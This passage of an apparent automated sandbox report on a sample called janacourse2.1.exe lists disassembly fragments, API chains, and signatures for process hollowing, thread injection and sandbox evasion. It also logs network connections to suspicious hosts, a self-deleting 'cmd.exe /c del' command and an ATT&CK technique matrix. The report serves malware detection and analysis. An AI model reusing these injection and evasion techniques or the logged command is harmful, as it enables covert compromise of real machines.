          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]1_2_03430AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]1_2_03504A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]1_2_03486AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]1_2_034B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]1_2_03504940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]1_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]1_2_034BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]1_2_034BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]1_2_034B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]1_2_034C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01010B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_01010B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE2622
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD083F
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD09D5 SetUnhandledExceptionFilter,0_2_00FD09D5
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FD0C21
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_005679E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_005679E1

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 480000Jump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 295F008Jump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01011201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01011201
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FF2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FF2BA5
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101B226 SendInput,keybd_event,0_2_0101B226
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101E355 mouse_event,0_2_0101E355
          Source: C:\Users\user\Desktop\janacourse2.1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\janacourse2.1.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01010B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_01010B62
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01011663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_01011663
          Source: janacourse2.1.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exeBinary or memory string: Progman
          Source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
          Source: explorer.exe, 00000002.00000002.2892314485.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1656745980.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2892873256.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1656745980.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2892873256.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD0698 cpuid 0_2_00FD0698
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01028195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_01028195
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0100D27A GetUserNameW,0_2_0100D27A
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FEBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FEBB6F
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB42DE

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: janacourse2.1.exeBinary or memory string: WIN_81
          Source: janacourse2.1.exeBinary or memory string: WIN_XP
          Source: janacourse2.1.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: janacourse2.1.exeBinary or memory string: WIN_XPe
          Source: janacourse2.1.exeBinary or memory string: WIN_VISTA
          Source: janacourse2.1.exeBinary or memory string: WIN_7
          Source: janacourse2.1.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01031204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_01031204
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01031806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01031806
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          1
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          1
          Credential API Hooking
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules
          2
          Valid Accounts
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          21
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Credential API Hooking
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          Logon Script (Windows)2
          Valid Accounts
          3
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares21
          Input Capture
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          DLL Side-Loading
          NTDS215
          System Information Discovery
          Distributed Component Object Model3
          Clipboard Data
          12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection
          1
          Rootkit
          LSA Secrets341
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts
          Cached Domain Credentials12
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Virtualization/Sandbox Evasion
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation
          Proc Filesystem11
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
          Process Injection
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586586 Sample: janacourse2.1.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 32 www.ffgzgbl.xyz 2->32 34 www.suv-deals-49508.bond 2->34 36 4 other IPs or domains 2->36 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 48 8 other signatures 2->48 11 janacourse2.1.exe 1 2->11         started        signatures3 46 Performs DNS queries to domains with low reputation 32->46 process4 signatures5 58 Binary is likely a compiled AutoIt script file 11->58 60 Found API chain indicative of sandbox detection 11->60 62 Writes to foreign memory regions 11->62 64 2 other signatures 11->64 14 svchost.exe 11->14         started        process6 signatures7 66 Modifies the context of a thread in another process (thread injection) 14->66 68 Maps a DLL or memory area into another process 14->68 70 Sample uses process hollowing technique 14->70 72 3 other signatures 14->72 17 explorer.exe 43 1 14->17 injected process8 dnsIp9 28 www.suv-deals-49508.bond 185.53.179.91, 49827, 80 TEAMINTERNET-ASDE Germany 17->28 30 energyecosystem.app 3.33.130.190, 50003, 80 AMAZONEXPANSIONGB United States 17->30 38 System process connects to network (likely due to code injection or exploit) 17->38 21 explorer.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 56 Switches to a custom stack to bypass stack traces 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          janacourse2.1.exe32%VirustotalBrowse
          janacourse2.1.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
